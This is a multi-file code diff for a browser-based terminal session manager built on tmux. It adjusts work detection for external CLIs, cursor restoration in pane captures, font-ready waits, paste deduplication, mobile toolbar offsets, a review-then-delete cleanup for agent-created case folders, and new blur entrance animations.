// measurement. Claude only: an external CLI's TUI has no ❯, so nothing would
// ever arm the idle confirmation and such a session would latch busy forever.
if (!isExternalCliMode(this.mode)) {
// measurement. This needs a pane Codeman can read: without a glyph to arm the idle
// confirmation, a session latches busy forever. A CLI that declares work detection
// supplies its own glyph, and the non-external modes keep the run they always had.
if (workDetect || !isExternalCliMode(this.mode)) {
this._activityStreak = trackActivityStreak(this._activityStreak, Date.now());
// A streak is the TRIGGER to look, not the verdict: typing into the composer
// also produces a steady stream of repaints. The screen settles it, and only
@@ -2449,10 +2473,30 @@ export class Session extends EventEmitter {
if (now - this._lastPaneProbeAt < PANE_PROBE_MIN_INTERVAL_MS) return this._lastPaneProbeWorking;
this._lastPaneProbeAt = now;
const text = this._mux.capturePaneText?.(this._muxSession.muxName) ?? null;
this._lastPaneProbeWorking = text === null ? null : CLAUDE_WORKING_LINE_PATTERN.test(text);
this._lastPaneProbeWorking = text === null ? null : this._workingLinePattern().test(text);
return this._lastPaneProbeWorking;
}
/**
* The regex matching this CLI's "a turn is running" status line.
*
* Compiled once per session and cached: `_probePaneWorking` runs it against a whole
* pane capture on a timer, and the throttled text detector runs it against every
* accumulated chunk. A CLI that declares no pattern falls back to Claude's, which is
* the pattern every session used before the registry carried one.
*/
private _workingLinePattern(): RegExp {
if (this._workingLineRe === undefined) {
const src = getCli(this.mode)?.capabilities.workDetect?.workingLine;
// Same guard the schema applies, not a second opinion: `compileVersionRegex()` is
// what keeps a nested quantifier out of this pattern, and this one runs on the PTY
// hot path. It returns null rather than throwing, and Claude's pattern is the
// fallback every session used before the registry carried one.
this._workingLineRe = (src ? compileVersionRegex(src) : null) ?? CLAUDE_WORKING_LINE_PATTERN;
}
return this._workingLineRe;
}
/**
* Mark the pane as working. Idempotent: `working` is emitted on the transition
* only, so the per-chunk detectors can all call it freely.
@@ -2541,10 +2585,6 @@ export class Session extends EventEmitter {
* PTY data chunk. Receives accumulated raw data to process in one batch.
*/
private _processExpensiveParsers(rawData: string): void {
// Skip Claude-specific parsers for external CLI sessions (Ralph tracker,
// BashToolParser, token + CLI-info parsing all depend on Claude's output format).
if (isExternalCliMode(this.mode)) return;
// Lazy ANSI strip: only compute cleanData when a consumer actually needs it.
let _cleanData: string | null = null;
const getCleanData = (): string => {
@@ -2554,6 +2594,19 @@ export class Session extends EventEmitter {
return _cleanData;
};
// Work detection by status line, ahead of the external-CLI gate below. The pattern
// comes from the CLI's own registry entry, so this is the one parser here that is not
// Claude-specific — and it sat under that gate, which is why an external CLI reported
// itself idle through an entire turn. Guarded on the descriptor so a CLI without one
// still skips the ANSI strip the gate used to save it.
if (!this._isWorking && getCli(this.mode)?.capabilities.workDetect) {
if (this._workingLinePattern().test(getCleanData())) this._markWorking();
}
// Skip Claude-specific parsers for external CLI sessions (Ralph tracker,
// BashToolParser, token + CLI-info parsing all depend on Claude's output format).
if (isExternalCliMode(this.mode)) return;
// Forward to Ralph tracker to detect Ralph loops and todos
// (opencode sessions already returned early at line 1209)
if (this._ralphTracker.enabled || !this._ralphTracker.autoEnableDisabled) {
@@ -2585,16 +2638,13 @@ export class Session extends EventEmitter {
this.parseTaskDescriptionsFromTerminalData(getCleanData());
}
// Work detection (text-based, needs clean data: the status line is coloured,
// so raw data has escape sequences between the `…` and the elapsed timer).
// Only check if a faster path didn't already trigger working state.
// Legacy gerunds, Claude-only. The status-line pattern above already ran for every
// CLI that declares one, so this adds only the older wording. Current Claude
// randomizes the word ("Actualizing…", "Finagling…"), so these catch a fraction of
// turns; the pattern above and the activity streak carry the rest.
if (!this._isWorking) {
const cleanData = getCleanData();
if (
CLAUDE_WORKING_LINE_PATTERN.test(cleanData) ||
// Legacy gerunds. Current Claude randomizes the word ("Actualizing…",
// "Finagling…"), so these catch only a fraction of turns; the pattern
// above and the activity streak carry the rest.
cleanData.includes('Thinking') ||
cleanData.includes('Writing') ||
cleanData.includes('Reading') ||
+108 -39
View File
@@ -528,6 +528,73 @@ export function normalizeScrollbackEol(buffer: string): string {
return buffer.replace(/\r?\n/g, '\r\n');
}
/** Pane geometry and caret position, as `display-message` reports them. */
interface PaneCursorGeometry {
cols: number;
rows: number;
cursorX: number;
cursorY: number;
}
/**
* Read the pane's cursor and size, or null when tmux cannot say.
*
* Every field is validated together: a caller that gets a value back can place
* a caret with it, and one that gets null must not try.
*/
export function queryPaneCursor(run: () => string): PaneCursorGeometry | null {
let raw: string;
try {
raw = run().trim();
} catch (cursorErr) {
console.error('[TmuxManager] Failed to query pane cursor after capture:', cursorErr);
return null;
}
const [cursorX, cursorY, cols, rows] = raw.split(/\s+/).map((value) => parseInt(value, 10));
if (
!Number.isFinite(cursorX) ||
!Number.isFinite(cursorY) ||
!Number.isFinite(cols) ||
!Number.isFinite(rows) ||
cursorX < 0 ||
cursorY < 0 ||
cols <= 0 ||
rows <= 0
) {
return null;
}
return { cols, rows, cursorX, cursorY };
}
/** SGR attributes, which is all `capture-pane -e` emits. */
// eslint-disable-next-line no-control-regex
const CAPTURE_STYLE_SEQUENCE = /\x1b\[[0-9;:]*m/g;
/** Whether a capture holds anything a reader would see, styles discounted. */
export function hasVisibleContent(capture: string): boolean {
return /\S/.test(capture.replace(CAPTURE_STYLE_SEQUENCE, ''));
}
/**
* Put the caret back where the pane has it, counting UP from the bottom of what
* was just replayed.
*
* Relative rather than absolute (`CUP`) on purpose. `\x1b[<row>;<col>H` numbers
* rows from the top of the browser's screen, so it only lands correctly while
* the browser's row count equals the pane's — and it need not, because
* `resizeWindow` fires its tmux resize without waiting, so a capture can be
* taken before a requested resize has been applied. Counting up from the last
* replayed row is anchored to the content instead, which is the thing both ends
* genuinely share.
*/
export function formatCursorRestore(geometry: PaneCursorGeometry): string {
const up = Math.max(0, geometry.rows - 1 - geometry.cursorY);
const right = Math.max(0, geometry.cursorX);
// `\r` first so the column is known: the replay leaves the caret wherever the
// last row's text ended.
return `${up > 0 ? `\x1b[${up}A` : ''}\r${right > 0 ? `\x1b[${right}C` : ''}`;
}
export function formatPaneSnapshot(
lines: string[],
geometry: { cols: number; rows: number; cursorX: number; cursorY: number }
@@ -3199,11 +3266,14 @@ export class TmuxManager extends EventEmitter implements TerminalMultiplexer {
* the browser xterm reproduces the live frame. Used for fast tab switches.
* - Full history (`opts.fullHistory`): `capture-pane -p -e -J -S -<N>` grabs
* the tmux scrollback (COD-47, bounded to the configured history limit),
* returned as linear scrollback text with SGR codes preserved (NOT
* repositioned — a multi-screen history can't be painted into a single
* visible frame, so the snapshot repaint is skipped). `-J` re-joins lines
* hard-wrapped at the pane width so they reflow in the browser xterm.
* Used for full page reloads so the user gets back their scroll history.
* returned as linear scrollback text with SGR codes preserved. Rows are not
* repainted at absolute positions — a multi-screen history can't be painted
* into a single visible frame — but the capture DOES end with a cursor move
* putting the caret back where the pane has it, counted up from the last
* replayed row. `-J` re-joins lines hard-wrapped at the pane width so they
* reflow in the browser xterm. Used for full page reloads so the user gets
* back their scroll history. Returns '' for a pane holding nothing visible,
* so the caller keeps whatever history it already had.
* Caveat: lines tmux has already evicted past its history-limit are gone.
*/
/**
@@ -3262,42 +3332,41 @@ export class TmuxManager extends EventEmitter implements TerminalMultiplexer {
execOpts.maxBuffer =
(opts?.maxCaptureBytes ?? DEFAULT_TERMINAL_BUFFER_MAX_BYTES) + FULL_HISTORY_CAPTURE_SLACK_BYTES;
}
const buffer = execSync(`${this.tmux()} ${captureFlags} -t ${shellescape(target)}`, execOpts).replace(
/\n+$/g,
''
);
// Full-history spans many screens — return it as raw linear scrollback
// rather than repainting rows at single-screen absolute positions. tmux
// joins scrollback rows with a bare `\n`; normalize to `\r\n` so a fresh
// xterm (convertEol:false) starts each replayed line at column 0 instead
// of staircasing diagonally (COD-138).
if (fullHistory) {
return normalizeScrollbackEol(buffer);
}
try {
const cursor = execSync(
const rawCapture = execSync(`${this.tmux()} ${captureFlags} -t ${shellescape(target)}`, execOpts);
// Query the cursor BEFORE deciding anything else. On the full-history path
// it settles both how the capture is trimmed and whether a cursor move is
// appended, and those two have to agree: trailing blank rows are only safe
// to keep when a move follows to put the caret back above them.
const geometry = queryPaneCursor(() =>
execSync(
`${this.tmux()} display-message -p -t ${shellescape(target)} '#{cursor_x} #{cursor_y} #{pane_width} #{pane_height}'`,
{
encoding: 'utf-8',
timeout: EXEC_TIMEOUT_MS,
}
).trim();
const [cursorX, cursorY, cols, rows] = cursor.split(/\s+/).map((value) => parseInt(value, 10));
if (
Number.isFinite(cursorX) &&
Number.isFinite(cursorY) &&
Number.isFinite(cols) &&
Number.isFinite(rows) &&
cursorX >= 0 &&
cursorY >= 0 &&
cols > 0 &&
rows > 0
) {
return formatPaneSnapshot(buffer.split('\n'), { cols, rows, cursorX, cursorY });
}
} catch (cursorErr) {
console.error('[TmuxManager] Failed to query pane cursor after capture:', cursorErr);
{ encoding: 'utf-8', timeout: EXEC_TIMEOUT_MS }
)
);
if (fullHistory) {
// Without geometry there is no cursor move, so fall back to the old trim.
// Keeping the blank rows here would park the caret at the bottom of the
// pane with nothing to correct it — worse than not trying at all.
if (!geometry) return normalizeScrollbackEol(rawCapture.replace(/\n+$/g, ''));
// Take the line terminator off and nothing else. The trailing blank rows
// that remain are the real bottom of the screen, and the cursor move
// below counts up from it. tmux joins rows with a bare `\n`; normalize to
// `\r\n` so a fresh xterm (convertEol:false) starts each replayed line at
// column 0 instead of staircasing diagonally (COD-138).
const trimmed = rawCapture.replace(/\n$/, '');
// An all-blank pane has to keep reading as "nothing to replay". The caller
// treats an empty string as "capture unavailable" and keeps the byte
// history; blank rows plus a cursor move are not empty, so without this a
// blank pane REPLACES that history with a blank screen — the downgrade
// `_replayWouldShrinkBuffer` exists to refuse, arriving from the server
// side where that guard cannot see it.
if (!hasVisibleContent(trimmed)) return '';
return `${normalizeScrollbackEol(trimmed)}${formatCursorRestore(geometry)}`;
}
const buffer = rawCapture.replace(/\n+$/g, '');
if (geometry) return formatPaneSnapshot(buffer.split('\n'), geometry);
// Cursor query failed or geometry was invalid, so we skip the absolute-
// positioned snapshot repaint and fall back to the raw capture. Normalize
// its bare `\n` line endings to `\r\n` so the replay doesn't staircase
+33
View File
@@ -157,6 +157,20 @@ export interface CaseInfo {
location?: 'local' | 'linked-local' | 'remote' | 'docker';
/** Whether this is a linked local folder */
linked?: boolean;
/**
* Present when Codeman scaffolded this case directory for an AGENT-spawned session
* (the packaged skill's workers, or any spawn naming a parent session), read back
* from the case's own marker file — see `src/agent-case-marker.ts`. Absent for every
* case a human created, linked or cloned, which is what makes it usable as the
* "safe to clean up" signal in the Manage tab.
*/
agentCreated?: {
createdAt: string;
createdBy: string;
parentSessionId?: string;
parentSessionName?: string;
mode?: string;
};
/** Remote case metadata for display and session creation */
remote?: {
hostId: string;
@@ -192,6 +206,25 @@ export interface CaseInfo {
};
}
/**
* One agent-created case as `GET /api/cases/agent-created` reports it: the cleanup
* view over `CaseInfo.agentCreated`, with the two facts a human needs before deleting
* a directory — whether an agent is still working in it, and when it was last touched.
*/
export interface AgentCaseSummary {
name: string;
path: string;
createdAt: string;
createdBy: string;
parentSessionId?: string;
parentSessionName?: string;
mode?: string;
/** A live session's working directory is this case — deleting it would pull the rug. */
inUse: boolean;
/** Directory mtime, so "nothing has touched this in a week" is answerable. */
modifiedAt?: string;
}
// ========== Error Handling Utilities ==========
/**
+37 -1
View File
@@ -1332,7 +1332,11 @@ class CodemanApp {
this._redock(id);
}
/** Clear all dashboard-side detached state/timers for a session. */
/** Clear all dashboard-side detached state/timers for a session, and take its
* sizing back: the popup owned the pane while it was open, so the dashboard's
* record of it is stale and the session it is showing needs re-measuring.
* ⚠️ Not idempotent — each call re-asserts, so a path that redocks twice for
* one close sends two SIGWINCHs. */
_redock(id) {
const t = this._detachWatchTimers.get(id);
if (t) { clearInterval(t); this._detachWatchTimers.delete(id); }
@@ -1340,6 +1344,21 @@ class CodemanApp {
this._detachOrphanStrikes.delete(id);
this.detachedWindows.delete(id);
this._markDetached(id, false);
// While the popup owned this session the dashboard sent no resizes, so
// `_lastResizeDims` — one value for the whole window — no longer describes
// the PTY, which the popup has been sizing. Clearing it makes the next
// sendResize report truthfully, on every redock path rather than only the
// active one: `selectSession` reads that answer to decide whether to wait
// for the TUI's redraw, and a false "unchanged" makes it fetch the frame
// before the redraw lands.
this._lastResizeDims = null;
// Sizing comes back with the session. `force` buys a guaranteed repaint for
// the case where popup and dashboard happened to agree on a size; the server
// already resizes on its own comparison against the real pane whenever the
// two differ.
if (this.sessions.has(id) && id === this.activeSessionId) {
this.sendResize(id, { force: true })?.catch?.(() => {});
}
}
/** Defer a channel-driven redock briefly. A popup *reload* emits 'redocked'
@@ -5906,6 +5925,23 @@ class CodemanApp {
}
}
// Hold for the terminal font before measuring anything. A cell measured
// against a fallback font gives the wrong column and row count, and the
// correction would land after the replay, leaving the CLI drawing against a
// frame the terminal no longer shows. Resolves immediately once the font is
// in, so this costs a tab switch nothing after the first load, and it is
// bounded, so a font that never arrives cannot strand the session.
// ⚠️ BEFORE `_beginBufferLoad` on purpose: inside it, every live SSE event
// for this session queues instead of painting, so a slow font would hold
// output back rather than merely mis-measuring the grid.
if (this._terminalFontReady) {
await this._terminalFontReady;
if (this._isStaleSelect(selectGen)) {
this._clearTerminalLoadState(sessionId, selectGen);
return;
}
}
// Load terminal buffer for this session
// Show cached content instantly while fetching fresh data in background.
// Use tail mode for faster initial load (128KB is enough for recent visible content).
+16
View File
@@ -659,6 +659,22 @@ function sortSessionsByActivity(rows) {
// prompt icons (powerline segments, folder/git glyphs from p10k, starship,
// oh-my-posh) render even though the text fonts carry no private-use-area
// symbols — while all readable text keeps coming from the text fonts.
/**
* How long a terminal fit will wait for the terminal font, in ms.
*
* `FontFaceSet.ready` has no deadline of its own and the wait sits in front of
* the buffer replay, so a font request that never settles would leave the
* session unpainted. Past this we measure whatever is painted.
*/
const TERMINAL_FONT_WAIT_MS = 2000;
/**
* Families in the stack that cannot move the measured cell, so nothing waits on
* them: the generics match no `FontFace`, and the bundled symbols face carries
* private-use-area glyphs only (xterm measures `W`) while weighing ~1.2MB.
*/
const TERMINAL_FONT_UNMEASURED = new Set(['monospace', 'serif', 'sans-serif', 'system-ui', 'symbols nerd font mono']);
const TERMINAL_FONT_DEFAULT_STACK =
'"Fira Code", "Cascadia Code", "JetBrains Mono", "SF Mono", Monaco, "Symbols Nerd Font Mono", monospace';
+9 -1
View File
@@ -25,7 +25,10 @@
* 3. The terminal pane is ONE shared element, so its entrance is marked at
* session creation but played at selection: a session created in the
* background must not animate the pane the user is currently looking at. Its
* styles are also restricted to transform/opacity/clip-path (see below).
* styles are also restricted to transform/opacity/clip-path (see below), with
* `blur` the one documented exception - a filter is the only thing that
* actually blurs a live xterm; styles.css carries the measurement and the
* three alternatives that do not work.
* 4. Nothing may animate on page load or reconnect replay. Only ids that pass
* through `markSessionTabEntering()` animate, and `_tabEnterSeen` makes that
* once-per-id even though the POST response and the SSE event both call
@@ -50,6 +53,7 @@ const TAB_ANIM_STYLES = [
{ key: 'unroll', label: 'Unroll', blurb: 'The strip makes room and the tab widens in.', duration: 480 },
{ key: 'boot', label: 'Boot', blurb: 'Flickers on under a green scan sweep.', duration: 720 },
{ key: 'flip', label: 'Flip', blurb: 'Drops in as a card hinged on its top edge.', duration: 520 },
{ key: 'blur', label: 'Blur', blurb: 'Focus-pulls in as the blur fades off it.', duration: 440 },
{ key: 'off', label: 'Off', blurb: 'Tabs just appear.', duration: 0 },
];
@@ -65,6 +69,7 @@ const WIN_ANIM_STYLES = [
{ key: 'unfold', label: 'Unfold', blurb: 'Hinges down from its top edge in 3D.', duration: 560 },
{ key: 'beam', label: 'Beam down', blurb: 'Waits for its line to reach it, then materializes.', duration: 620 },
{ key: 'pop', label: 'Pop', blurb: 'Springs open from its centre.', duration: 460 },
{ key: 'blur', label: 'Blur', blurb: 'Focus-pulls in as the blur fades off it.', duration: 560 },
{ key: 'off', label: 'Off', blurb: 'Windows just appear.', duration: 0 },
];
@@ -73,6 +78,7 @@ const LINE_ANIM_STYLES = [
{ key: 'draw', label: 'Draw', blurb: 'Draws itself from the tab down to the window.', duration: 420 },
{ key: 'packet', label: 'Packet', blurb: 'Line fades in, then a bright packet runs down it.', duration: 700 },
{ key: 'fade', label: 'Fade', blurb: 'Simply fades in.', duration: 300 },
{ key: 'blur', label: 'Blur', blurb: 'Focus-pulls in as the blur fades off it.', duration: 380 },
{ key: 'off', label: 'Off', blurb: 'Lines just appear.', duration: 0 },
];
@@ -92,6 +98,7 @@ const TERM_ANIM_STYLES = [
{ key: 'wipe', label: 'Wipe', blurb: 'Reveals top-to-bottom behind a bright edge.', duration: 520 },
{ key: 'slide', label: 'Slide up', blurb: 'Rises into place from below.', duration: 420 },
{ key: 'fade', label: 'Fade', blurb: 'Quiet fade with a touch of scale.', duration: 340 },
{ key: 'blur', label: 'Blur', blurb: 'Focus-pulls in as the blur lifts off the pane.', duration: 520 },
{ key: 'off', label: 'Off', blurb: 'Current behaviour: the pane just appears.', duration: 0 },
];
@@ -102,6 +109,7 @@ const BEAM_HOLD_MS = 360;
const ANIM_THEMES = [
{ key: 'terminal', label: 'Terminal', tab: 'crt', win: 'crt', line: 'draw', term: 'crt' },
{ key: 'beamdown', label: 'Beam down', tab: 'crt', win: 'beam', line: 'draw', term: 'wipe' },
{ key: 'softfocus', label: 'Soft focus', tab: 'blur', win: 'blur', line: 'blur', term: 'blur' },
{ key: 'quiet', label: 'Quiet', tab: 'slide', win: 'materialize', line: 'fade', term: 'fade' },
{ key: 'playful', label: 'Playful', tab: 'pop', win: 'pop', line: 'packet', term: 'slide' },
{ key: 'legacy', label: 'Legacy', tab: 'off', win: 'fly', line: 'off', term: 'off' },
+13 -2
View File
@@ -60,9 +60,22 @@ Object.assign(CodemanApp.prototype, {
document.body.appendChild(trap);
trap.focus();
// One Ctrl+V can deliver TWO paste events to this trap. The
// execCommand('paste') below fires one wherever the browser honours that
// command, and the key's own default action fires another, because xterm's
// custom key handler returns false without cancelling the keydown. Handling
// both sends the clipboard text to the PTY twice, which is the "Ctrl+V
// pastes twice, right-click Paste does not" report: the context-menu paste
// has no keydown, so it only ever produces one event. The trap therefore
// accepts the first paste and drops every later one.
var pasteConsumed = false;
// Listen for the paste event on our trap
trap.addEventListener('paste', function(e) {
e.stopPropagation();
e.preventDefault();
if (pasteConsumed) return;
pasteConsumed = true;
// Check for images in clipboard items
var imageFiles = [];
@@ -84,7 +97,6 @@ Object.assign(CodemanApp.prototype, {
}, 0);
if (imageFiles.length > 0) {
e.preventDefault();
self._uploadAndInsertImages(imageFiles);
} else {
// No image -- route text through xterm's paste() so bracketed-paste
@@ -94,7 +106,6 @@ Object.assign(CodemanApp.prototype, {
// indistinguishable from typed input, weakening the CLI's
// prompt-injection defenses.
var text = e.clipboardData ? e.clipboardData.getData('text/plain') : '';
e.preventDefault();
if (text && self.terminal) self.terminal.paste(text);
}
});
+1
View File
@@ -1889,6 +1889,7 @@
<option value="legacy">Off (default)</option>
<option value="terminal">Terminal (CRT)</option>
<option value="beamdown">Beam down</option>
<option value="softfocus">Soft focus (blur)</option>
<option value="quiet">Quiet</option>
<option value="playful">Playful</option>
<option value="custom">Custom (set in the lab)</option>
+7
View File
@@ -148,6 +148,13 @@ const MobileDetection = {
if (typeof KeyboardHandler !== 'undefined' && KeyboardHandler.keyboardVisible) return;
const vh = window.visualViewport?.height || window.innerHeight;
document.documentElement.style.setProperty('--app-height', `${vh}px`);
// How far the layout viewport (which anchors position: fixed) extends below
// the visual viewport, i.e. behind the browser's bottom bar. 0 on iPhone
// Safari, where fixed elements already stop above the bar; the overlap
// where they do not. mobile.css lifts the toolbar by this rather than by
// (100vh - --app-height), which on iPhone measures the collapsible chrome
// instead and left an empty band between the toolbar and the bar.
document.documentElement.style.setProperty('--chrome-overlap', `${Math.max(0, window.innerHeight - vh)}px`);
},
/** Initialize mobile detection and set up resize listener */
+12 -1
View File
@@ -228,6 +228,11 @@ Object.assign(CodemanApp.prototype, {
name: item.name || '',
title: title || item.name || dir.split('/').pop() || item.sessionId.slice(0, 8),
mode: item.mode || 'claude',
// Only the scanner sets this, and only for a codex rollout. Dropping it here
// is not cosmetic: resumeMobileOverviewSession() passes row.resumeId on to
// resumeHistorySession(), so without it a tapped Codex row starts a FRESH
// session on a thread that is already on disk.
resumeId: item.resumeId || undefined,
caseName: matched ? matched.name : '',
dir: this._shortenHomePath ? this._shortenHomePath(dir) : dir,
at: item.lastActivityAt || item.createdAt || 0,
@@ -389,7 +394,13 @@ Object.assign(CodemanApp.prototype, {
async resumeMobileOverviewSession(sessionId) {
const row = (this._mobileOverviewPastRows || []).find((r) => r.id === sessionId);
if (!row || !row.workingDir) return;
await this.resumeHistorySession(row.claudeSessionId || row.id, row.workingDir, row.name || undefined, row.mode);
await this.resumeHistorySession(
row.claudeSessionId || row.id,
row.workingDir,
row.name || undefined,
row.mode,
row.resumeId
);
},
// ═══════════════════════════════════════════════════════════════
+11 -8
View File
@@ -471,11 +471,11 @@ html.mobile-init .file-browser-panel {
padding-bottom: calc(40px + var(--safe-area-bottom));
}
/* iOS Safari: toolbar is pushed up by (100vh - --app-height) to clear the
browser's bottom bar. Match that offset in main's padding so the terminal
doesn't extend behind the toolbar. */
/* iOS Safari: the toolbar is lifted by --chrome-overlap where the browser's
bottom bar would otherwise cover it. Match that offset in main's padding so
the terminal doesn't extend behind the toolbar. */
.ios-device.safari-browser .main {
padding-bottom: calc(40px + var(--safe-area-bottom) + (100vh - var(--app-height, 100vh)));
padding-bottom: calc(40px + var(--safe-area-bottom) + var(--chrome-overlap, 0px));
}
.header-right {
@@ -780,11 +780,14 @@ html.mobile-init .file-browser-panel {
will-change: transform;
}
/* iOS Safari with tab bar: position: fixed uses the layout viewport which
extends behind the browser chrome. Offset the toolbar upward by the delta
between 100vh (layout) and --app-height (visual). */
/* iOS Safari: where position: fixed anchors to a layout viewport that
extends behind the browser's bottom bar, lift the toolbar by that overlap.
--chrome-overlap is innerHeight minus the visual viewport height, set in
mobile-handlers.js. On iPhone Safari it is 0 because fixed elements already
stop above the bar; the previous (100vh - --app-height) lift measured the
collapsible chrome instead and left an empty band above the bar. */
.ios-device.safari-browser .toolbar {
bottom: calc(var(--safe-area-bottom) + (100vh - var(--app-height, 100vh)));
bottom: calc(var(--safe-area-bottom) + var(--chrome-overlap, 0px));
}
/* When keyboard is visible the JS translateY already accounts for the full
+7 -1
View File
@@ -670,7 +670,13 @@ Object.assign(CodemanApp.prototype, {
} else if (record.workingDir) {
// History rows are keyed by the Claude conversation UUID; resumed
// sessions carry theirs separately as claudeSessionId.
void this.resumeHistorySession(s.claudeSessionId || s.sessionId, record.workingDir, undefined, s.mode);
void this.resumeHistorySession(
s.claudeSessionId || s.sessionId,
record.workingDir,
undefined,
s.mode,
s.resumeId
);
}
},
});
+93 -3
View File
@@ -804,7 +804,7 @@ Object.assign(CodemanApp.prototype, {
btn.append(...parts);
btn.addEventListener('click', (e) => {
e.stopPropagation();
this.resumeHistorySession(s.sessionId, s.workingDir, s.name, s.mode);
this.resumeHistorySession(s.sessionId, s.workingDir, s.name, s.mode, s.resumeId);
});
container.appendChild(btn);
}
@@ -3595,17 +3595,33 @@ Object.assign(CodemanApp.prototype, {
return;
}
let html = '';
// Cases an agent worker created (server-side marker file, see agent-case-marker.ts).
// A long orchestration leaves one scratch directory per worker behind, so they get
// a badge and a bulk cleanup entry point rather than having to be recognised by name.
const agentCases = cases.filter(c => c.agentCreated);
let html = agentCases.length > 0
? `<div class="case-manage-agent-bar">
<span class="case-manage-agent-count">${agentCases.length} case${agentCases.length === 1 ? '' : 's'} created by agent workers</span>
<button class="case-manage-btn case-manage-btn-cleanup" onclick="app.cleanupAgentCases()"
title="Review and delete the scratch cases agent workers left behind">Clean up</button>
</div>`
: '';
cases.forEach((c, idx) => {
const isFirst = idx === 0;
const isLast = idx === cases.length - 1;
// Was `/Users/<user>` only, the mirror image of the Run menu's bug: every
// case path on a Linux host rendered in full, unabbreviated.
const pathDisplay = c.path ? this._shortenHomePath(c.path) : '';
const agentTitle = c.agentCreated
? `Created by an agent worker${c.agentCreated.parentSessionName ? ` from ${c.agentCreated.parentSessionName}` : ''}` +
` (${c.agentCreated.createdBy})${c.agentCreated.createdAt ? ` on ${new Date(c.agentCreated.createdAt).toLocaleString()}` : ''}`
: '';
html += `
<div class="case-manage-item" data-case="${escapeHtml(c.name)}">
<div class="case-manage-info">
<span class="case-manage-name">${escapeHtml(c.name)}</span>
<span class="case-manage-name">${escapeHtml(c.name)}${
c.agentCreated ? `<span class="case-manage-tag-agent" title="${escapeHtml(agentTitle)}" data-i18n-skip>agent</span>` : ''
}</span>
<span class="case-manage-path">${escapeHtml(pathDisplay)}</span>
</div>
<div class="case-manage-actions">
@@ -3683,6 +3699,80 @@ Object.assign(CodemanApp.prototype, {
}
},
/**
* Review-then-delete the scratch cases agent workers left behind.
*
* ⚠️ Never silently bulk-deletes: the confirm names every directory, and a case a
* LIVE session is still working in is excluded outright rather than confirmed away
* (`inUse` from the server, which knows every session's working directory). Removal
* reuses `DELETE /api/cases/:name` one name at a time, so there is no second
* recursive-delete path to keep in step with the first.
*/
async cleanupAgentCases() {
let agentCases;
try {
const res = await fetch('/api/cases/agent-created');
const body = await res.json();
if (!body.success) {
this.showToast(body.error || 'Failed to list agent cases', 'error');
return;
}
agentCases = body.data.cases || [];
} catch (err) {
this.showToast('Failed to list agent cases: ' + err.message, 'error');
return;
}
const busy = agentCases.filter(c => c.inUse);
const removable = agentCases.filter(c => !c.inUse);
if (removable.length === 0) {
this.showToast(
busy.length > 0
? `All ${busy.length} agent case(s) are still in use by a running session`
: 'No agent-created cases to clean up',
'info'
);
return;
}
const names = removable.map(c => ` ${c.name}`).join('\n');
const busyNote = busy.length > 0 ? `\n\nSkipping ${busy.length} case(s) still in use by a running session.` : '';
if (!confirm(`Permanently delete ${removable.length} agent-created case folder(s) and everything in them?\n\n${names}${busyNote}`)) {
return;
}
let deleted = 0;
const failed = [];
for (const item of removable) {
try {
const res = await fetch(`/api/cases/${encodeURIComponent(item.name)}`, { method: 'DELETE' });
const body = await res.json();
if (body.success) deleted++;
else failed.push(item.name);
} catch {
failed.push(item.name);
}
}
this.showToast(
failed.length === 0
? `Deleted ${deleted} agent case(s)`
: `Deleted ${deleted}, failed: ${failed.join(', ')}`,
failed.length === 0 ? 'success' : 'error'
);
// Refresh the picker (its selected case may be one we just deleted) and the list.
const select = document.getElementById('quickStartCase');
const currentCase = select?.value;
const currentDeleted = removable.some(c => c.name === currentCase);
if (currentDeleted) select?.blur?.();
await this.loadQuickStartCases(currentDeleted ? null : currentCase);
if (currentDeleted) {
await this.saveLastUsedCase(document.getElementById('quickStartCase')?.value || 'testcase');
}
this.renderCaseManageList();
},
async saveCaseOrder(order) {
try {
await fetch('/api/cases/order', {
+167 -5
View File
@@ -905,6 +905,28 @@ html[data-tab-anim="flip"] .session-tab.tab-enter {
100% { opacity: 1; transform: perspective(700px) rotateX(0deg); }
}
/* Blur, iOS-style focus pull: the tab arrives out of focus and the blur fades
OFF it as the opacity comes up, so it reads as resolving rather than moving.
Opacity leads the blur (full opacity around 45%, blur still lifting) - that
offset is what separates it from a plain cross-fade.
`filter` here, not on ::before: the tab's own box-shadow and border have to
blur with it or the shape stays sharp inside a blurred fill, and unlike
background/box-shadow (which .session-tab.active sets !important) nothing
overrides filter. */
html[data-tab-anim="blur"] .session-tab.tab-enter {
animation-name: tab-enter-blur;
animation-duration: calc(440ms * var(--anim-enter-scale, 1));
animation-timing-function: cubic-bezier(0.32, 0.72, 0, 1);
will-change: transform, opacity, filter;
}
@keyframes tab-enter-blur {
0% { opacity: 0; filter: blur(10px); transform: scale(0.94); }
45% { opacity: 1; }
100% { opacity: 1; filter: blur(0px); transform: none; }
}
/* ── Entrance lab (?animlab=1) ───────────────────────────────────────────── */
.anim-lab {
@@ -1186,6 +1208,25 @@ html[data-win-anim="pop"] .ultracode-window.win-enter {
100% { opacity: 1; transform: scale(1); }
}
/* Blur, iOS-style focus pull. `materialize` is the noisy cousin: it glitches the
opacity and rides a brightness boost. This one only defocuses, so it stays
readable next to a terminal. The scale is deliberately small (0.96): the
connection line is aimed at getBoundingClientRect(), which reports the
TRANSFORMED box, so a big scale would swing the line's target while it draws.
applyWindowEntrance() redraws the lines once the animation ends. */
html[data-win-anim="blur"] .subagent-window.win-enter,
html[data-win-anim="blur"] .ultracode-window.win-enter {
animation-name: win-enter-blur;
animation-duration: calc(560ms * var(--anim-enter-scale, 1));
animation-timing-function: cubic-bezier(0.32, 0.72, 0, 1);
}
@keyframes win-enter-blur {
0% { opacity: 0; filter: blur(18px); transform: scale(0.96); }
50% { opacity: 1; }
100% { opacity: 1; filter: blur(0px); transform: none; }
}
/* ── Main terminal pane entrance animations ────────────────────────────────
⚠ transform / opacity / clip-path ONLY. xterm's FitAddon derives rows+cols
from getComputedStyle(parent).width/height, the untransformed layout box -
@@ -1327,6 +1368,47 @@ html[data-term-anim="fade"] .terminal-container.term-enter {
100% { opacity: 1; transform: none; }
}
/* Blur, iOS-style focus pull.
⚠ THE ONE PLACE A `filter` GOES ON THE TERMINAL CONTAINER, and it is a
deliberate exception to the rule above, not an oversight. Every other way of
blurring this pane was tried against a real xterm and does not work:
- `backdrop-filter` on ::before blurs perfectly while it is STATIC, and
Chrome silently drops the backdrop the moment ANY animation runs on that
pseudo-element (measured: the veil computes `blur(15.3px)` and the text
behind it stays razor sharp). Animating the container instead keeps the
backdrop, so the veil would have to hold one fixed radius, which is a
frosted pane that snaps off rather than a focus pull.
- Driving the radius from rAF avoids the compositor promotion, at the cost
of the same full-screen blur per frame plus main-thread work.
